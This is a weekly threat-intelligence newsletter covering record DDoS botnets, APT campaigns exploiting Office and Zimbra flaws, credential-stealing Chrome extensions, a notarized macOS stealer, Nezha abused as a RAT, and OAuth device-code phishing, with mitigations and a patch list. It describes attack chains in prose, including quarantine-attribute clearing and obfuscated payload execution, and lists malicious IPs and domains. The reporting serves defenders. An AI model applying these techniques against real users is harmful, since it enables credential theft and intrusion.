EvilBit Threat Digest - When the Bots Come Knocking: Record DDoS, State Actors, and the Week in Malware

KryptoKat here. It's been a particularly chaotic three days since our last check-in. The threat landscape delivered a record-breaking DDoS botnet, fresh APT campaigns from familiar adversaries, and a reminder that every platform--mobile, desktop, browser--is under sustained assault. The connective tissue this week is volume and persistence: massive botnets hammering infrastructure, state actors running multi-year espionage operations, and commodity malware campaigns that just won't quit.

Let's dig in.

The Aisuru Botnet: Setting New Records in Distributed Destruction

When Cloudflare publishes a threat intelligence report with numbers like 29.7 terabits per second and 14.1 billion packets per second, you pay attention. The Aisuru botnet represents the current state of the art in volumetric DDoS attacks, and its operational scale is genuinely staggering.

Aisuru emerged in early October and rapidly escalated from modest UDP floods to record-setting carpet-bombing attacks by mid-December. The botnet is estimated to comprise somewhere between 1 and 4 million compromised hosts--predominantly IoT devices, consumer routers (Totolink, Nexxt, Linksys, Zyxel), DVRs, IP cameras, and Cambium Networks wireless access points. Cloudflare's Q3 DDoS threat report notes that the botnet also includes a sizable contingent of cloud VMs, suggesting the operators are leveraging compromised cloud infrastructure alongside traditional IoT victims.

The attack methodology is straightforward but devastatingly effective: UDP amplification floods targeting telecommunications, IT services, and gaming sectors. The 29.7 Tbps peak represents the largest publicly documented DDoS event to date, eclipsing previous records by a significant margin. The collateral damage has been substantial--ISPs and transit providers in the US and globally have seen service degradation even when they weren't the primary targets, simply due to the sheer volume of malicious traffic saturating network links.

For defenders, Cloudflare published extensive IOCs: file hashes, domain names, hostnames, and IP addresses associated with the botnet's command-and-control infrastructure. The mitigations are textbook DDoS hygiene but worth reiterating: deploy robust DDoS protection capable of absorbing or scrubbing ultra-high-volume floods, harden and patch edge devices where vendor updates exist, and implement DNS-level rate limiting and ingress filtering to reduce collateral amplification. Protos Labs' deep dive provides additional technical context and detection strategies for network operators.

The broader takeaway: IoT security (or lack thereof) remains a systemic vulnerability. The same device categories compromised in 2016's Mirai botnet are still being compromised today. Until manufacturers ship devices with secure defaults and automatic patching, we'll continue to see botnets of this scale.

APT Campaigns: Persistent Adversaries, Evolving Tactics

Cloud Atlas Returns with Old Exploits and New Tradecraft

Kaspersky's analysis of Cloud Atlas activity in the first half of 2025 shows a group that's refined its approach while sticking to a familiar playbook. The APT (also tracked as ToddyCat by some vendors) continues to target high-value entities in Russia and Belarus--telecommunications providers, construction firms, and government agencies--using a multi-stage infection chain that blends old and new.

The initial access vector remains spearphishing with malicious Office documents, exploiting the ancient-but-still-effective CVE-2018-0802 in Microsoft Office Equation Editor. Yes, a 2018 vulnerability is still yielding access in 2025. The attackers also leveraged CVE-2025-55182, the recent React Server Components RCE we've covered extensively in prior editions, demonstrating their ability to rapidly integrate newly disclosed vulnerabilities into their toolkit.

Once initial execution is achieved, the campaign deploys a suite of custom backdoors: VBShower, PowerShower, VBCloud, and CloudAtlas. These tools provide the usual APT capabilities--command execution, file exfiltration, credential harvesting, and lateral movement. What's interesting is the operational security: the actors use process injection, DLL side-loading, and obfuscation to evade detection, and they maintain long-term access by establishing scheduled tasks and registry persistence.

Kaspersky provides IOCs (file hashes, domains, URLs) and MITRE ATT&CK mappings for defensive teams. The persistence mechanisms--Active Setup registry keys, scheduled tasks, and hidden startup items--are all detectable if you're actively hunting for them. For organizations in the targeted regions or sectors, this is a high-priority threat to incorporate into detection engineering workflows.

Russian APT Targets Baltics and Balkans with Zimbra Exploitation

A separate campaign documented by StrikeReady shows Russian APT operators exploiting CVE-2025-27915, a stored cross-site scripting (XSS) vulnerability in Zimbra Collaboration Suite, to harvest credentials from government and critical infrastructure targets across the Baltic and Balkan regions.

The attack begins with spearphishing emails containing malicious ICS (calendar invite) attachments. When the victim opens the attachment in a vulnerable Zimbra instance, the embedded XSS payload executes, presenting a fake login form that exfiltrates credentials to the attacker's infrastructure. In some cases, the payload also delivers UPX-packed malware for persistent access.

CISA added CVE-2025-27915 to the Known Exploited Vulnerabilities catalog on December 22, and Zimbra has released patches in versions 10.0.13, 10.1.5, and 9.0.0 P44 and later. The campaign has been active since at least 2023, suggesting the operators have had sustained access to unpatched instances for an extended period.

For defenders running Zimbra, the immediate actions are to patch to the fixed versions, block the known malicious IP (193.29.58.37), and hunt for the file hashes and email lure indicators provided by StrikeReady. If you can't patch immediately, disable ICS processing in Zimbra and enforce multi-factor authentication on all user accounts.

Mobile and Endpoint Malware: From Uzbekistan to macOS

Android SMS Stealers Compromise 100,000 Devices in Uzbekistan

Group-IB's research into the Qwizzserial and Wonderland SMS stealer families reveals a campaign that has quietly compromised approximately 100,000 Android devices in Uzbekistan. The malware targets banking applications, intercepting SMS-based one-time passwords and exfiltrating credentials to attacker-controlled infrastructure. Victims have collectively suffered over $62,000 in confirmed losses, though the actual figure is likely much higher.

The attack vector is straightforward but effective: malicious APKs distributed via Telegram channels, masquerading as legitimate government services or financial assistance applications. Once installed, the malware requests SMS and phone state permissions, then silently harvests OTPs as they arrive, forwarding them to the attacker's server. The campaign's success is a direct consequence of Uzbekistan's financial infrastructure relying almost exclusively on SMS for two-factor authentication, with minimal adoption of stronger methods like biometrics or 3D Secure.

Group-IB provides file hashes and network IOCs for detection. The mitigations are procedural and technical: download apps only from official stores, enable biometric authentication where available, and implement mobile device management (MDM) policies that restrict installation sources and monitor suspicious SMS activity. For regional financial institutions, this is a wake-up call to move beyond SMS-based authentication.

Phantom Shuttle: Chrome Extensions as Credential Harvesters

Socket.dev's research uncovered two malicious Chrome extensions both named "Phantom Shuttle" that have been active on the Chrome Web Store since at least 2017. The extensions masquerade as VPN or network speed testing tools but actually route web traffic through attacker-controlled proxy servers, exfiltrating plaintext credentials every five minutes.

The attack is clever in its simplicity: users install what they believe is a legitimate productivity tool, unknowingly granting the extension permission to intercept and modify all web requests. The extension routes traffic for over 170 high-value domains--including GitHub, Docker Hub, AWS, Stack Overflow, and various social media sites--through the proxy at phantomshuttle.space, where credentials are harvested via man-in-the-middle interception. The extensions also charge subscription fees, so victims are literally paying for the privilege of being compromised.

The campaign's longevity (8+ years) and the fact that the extensions remain available on the official Chrome Web Store as of December 23 underscore the challenges of extension vetting and malware persistence in app stores. For defenders, the immediate actions are to block phantomshuttle.space at the network perimeter, audit all installed browser extensions, and enforce Chrome enterprise policies that restrict extensions to an allowlist of trusted publishers. All credentials potentially accessed through affected browsers should be rotated immediately.

MacSync Stealer: Notarized Malware on macOS

UncleSp1d3r here. The macOS threat landscape continues to mature, and Jamf's analysis of MacSync Stealer is a textbook example of adversaries abusing Apple's developer trust model. The malware arrives as a notarized, code-signed Swift application packaged in a disk image (zk-call-messenger-installer-3.9.2-lts.dmg), which passes macOS Gatekeeper checks because it's signed with a legitimate Developer Team ID (GNJLS3UYZ4).

Once executed, the installer runs runtimectl to fetch an obfuscated script from focusgroovy.com, gatemaden.space, or zkcall.net. The script is downloaded to /tmp/runner, executed to clear the com.apple.quarantine extended attribute, validated with spctl, and then run. The payload itself is obfuscated via base64 encoding, gzip compression, and eval, minimizing on-disk artifacts and evading signature-based detection.

The malware establishes persistence via ~/Library/Application Support/UserSyncWorker/ and logs activity to ~/Library/Logs/UserSyncWorker.log. The C2 infrastructure supports staged payload delivery, credential theft, and file exfiltration. Jamf reported the malicious developer certificate to Apple, which subsequently revoked it--but the malware demonstrates the ongoing challenge of combating signed, notarized threats.

For macOS defenders, the hunting indicators are clear: creation of the UserSyncWorker directory and log file, execution of /tmp/runner, suspicious network connections to the listed domains, and the specific Developer Team ID. Block the domains at the perimeter, deploy EDR configured to alert on these patterns, and consider restricting or monitoring the use of runtimectl and spctl in your environment. Jamf Protect customers should enable block mode for advanced threat prevention.

Nezha Monitoring Tool Abused as a RAT

Legitimate system administration tools continue to be repurposed for post-exploitation access. Multiple outlets report that threat actors are deploying the open-source Nezha monitoring agent as a remote access trojan (RAT) to maintain stealthy, elevated access to compromised systems.

Nezha is a cross-platform (Linux, Windows, macOS) server monitoring tool that runs with root or SYSTEM privileges and communicates with a central dashboard over TCP. Attackers abuse this by deploying the agent on compromised hosts and pointing it at their own Alibaba Cloud-hosted C2 infrastructure. The result is a powerful backdoor that supports command execution and file transfers while appearing as a benign monitoring agent.

The detection challenge is context: Nezha itself isn't malicious, and blocking it wholesale would break legitimate use cases. Defenders need to focus on usage patterns--unexpected Nezha deployments, C2 traffic to unfamiliar or suspicious IP addresses (particularly Alibaba Cloud ranges associated with known malicious infrastructure), and process injection or anomalous PowerShell spawned by the agent.

The mitigations are behavioral: monitor for unexpected agent installations, segment network access to known C2 infrastructure, and implement endpoint detection rules that flag anomalous Nezha activity. This is another reminder that dual-use tools demand context-aware detection, not just signature-based blocking.

OAuth Device Code Flow: The New Phishing Frontier

Proofpoint's research on OAuth 2.0 device code flow abuse highlights a technique that's gaining traction among threat actors targeting Microsoft 365 environments. The attack leverages the legitimate device authorization grant flow (defined in RFC 8628) to trick users into approving sign-ins on real Microsoft pages, yielding valid cloud session tokens without stealing passwords directly.

The attack chain works like this: the victim receives a phishing email or SMS containing a link. Clicking the link directs them to a legitimate Microsoft device code approval page (microsoft.com/devicelogin), where they're prompted to enter a code and approve the sign-in. The user believes they're completing a legitimate authentication step, but they're actually authorizing the attacker's application to access their Microsoft 365 account. Once approved, the attacker receives a valid OAuth token with full access to email, files, and other cloud resources.

This technique bypasses traditional phishing detections because the victim interacts with a genuine Microsoft page, and it can circumvent some MFA configurations because the device code flow is designed to work without MFA enforcement in certain scenarios. Mandiant, Volexity, and Microsoft themselves have all documented real-world abuse of this technique by multiple threat actors.

For defenders, the mitigations are tenant-level policy enforcement and monitoring:

• Disable or tightly scope the OAuth 2.0 device code flow for tenants or specific applications where it's not required.
• Enforce Conditional Access policies requiring compliant/managed devices and strong authentication for all cloud app sign-ins.
• Restrict user consent; require admin consent and review enterprise app permissions regularly.
• Monitor Azure AD/Entra sign-in logs for grant_type=device_code anomalies, unfamiliar locations, and atypical user agents.
• Enable token protection, continuous access evaluation, and sign-in risk policies.
• Train users to verify that they initiated any device code prompt themselves before approving.

Microsoft's official documentation on the device code flow includes security considerations and configuration guidance. This is a technique-focused defense--there aren't specific IOCs to block, but the policy controls are actionable and effective.

Closing Thoughts

This week's stories share a common thread: adversaries are diversifying their tactics, targeting every available platform and trust relationship. IoT botnets achieve record-breaking scale because manufacturers still ship devices with default credentials. APT groups maintain multi-year access because organizations don't patch seven-year-old Office vulnerabilities. Mobile malware thrives because users trust apps distributed via Telegram. And phishing succeeds because the attack surface has shifted from fake login pages to legitimate OAuth flows.

The fundamentals still matter. Patch known vulnerabilities, audit third-party access, enforce least privilege, and educate users. But the landscape is moving fast, and defensive success increasingly depends on behavioral detection, context-aware analysis, and the willingness to enforce restrictive policies even when they're inconvenient.

So patch your Zimbra instances, revoke that sketchy Chrome extension, and maybe take a hard look at your OAuth tenant policies before the holiday break. The threat actors aren't taking time off, and neither should your defenses.

Keep the logs rolling and the alerts tuned. We'll be back with more after the holiday.

-- KryptoKat & UncleSp1d3r

Vendor Patch Roundup

For vulnerability management teams, the following patches and plugin updates were released this week:

• QNAP QTS/QuTS hero: CVE-2024-37046 (post-auth path traversal) patched in QTS 5.2.1.2930 build 20241025+ and QuTS hero h5.2.1.2929 build 20241025+. Tenable OT plugin 504869 and Nessus plugins 279500/279501 released.
• Red Hat Enterprise Linux: RHSA-2025:23733 and RHSA-2025:23737 (go-toolset vulnerabilities), RHSA-2025:23745 (git-lfs), RHSA-2025:23730 (kpatch), RHSA-2025:23736/23747 (grafana), RHSA-2025:23739 (mod_md), RHSA-2025:23789 (kernel).
• Photon OS 5.0: Linux kernel CVE-2024-53177 (use-after-free in SMB client) patched in linux-6.1.159-4.ph5.
• Fedora: gobuster package updates.
• Debian: python3-mechanize package updates.

Full plugin details available at Tenable's update page.